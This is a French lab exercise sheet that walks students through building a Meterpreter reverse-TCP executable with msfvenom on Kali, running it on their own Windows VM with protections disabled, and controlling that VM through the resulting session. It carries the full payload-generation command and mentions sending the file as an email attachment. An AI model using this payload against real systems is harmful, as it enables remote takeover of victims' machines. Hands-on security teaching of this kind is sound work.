tp3 Exercice
tp3 Exercice
tp3 Exercice
Attention /!\: Vous n'avez pas le droit d'exploiter les malwares créés contre des machines
qui ne vous appartiennent pas.
a) Le ping entre les deux machines est fonctionnel dans les deux sens.
b) Sur votre VM Windows vérifiez que le pare-feu et l'antivirus sont désactivés.
2) Sur votre machine kali il faut sortir de la console "msfconsole" ensuite tapez la commande
"msfvenom -p windows/meterpreter/reverse_tcp -a x86 --platform windows -f exe
LHOST=<IP de votre machine kali> PORT=4444 -o /home/kali/Desktop/ISIDS.exe"
Une fois votre commande tapée, cliquez sur entrée et le fichier "ISIDS.exe" va se créer sur
votre bureau.
Afin d'infecter la machine cible, un attaquant pourra envoyer ce dernier par mail en tant que
pièce jointe au mail.
Vous aurez le message suivant [*] Started reverse TCP handler on <IP de la machine
Kali>:4444. Que signifie ce message ?
Maintenant que notre machine Kali est prête à recevoir le trafic, rendez-vous sur votre
machine Windows (avec le pare-feu et antivirus désactivés).
Lancez le programme "ISIDS.exe " après l'avoir transféré sur votre machine Windows. Que
dis la fenêtre qui s'affiche ?
Cliquez sur "Exécuter". Une fois le programme exécuté, que remarque vous dans votre
machine kali ?
k) Tapez la commande "ps", vous pouvez fermer n'importe quel processus avec la
commande "kill <PID de l'application>"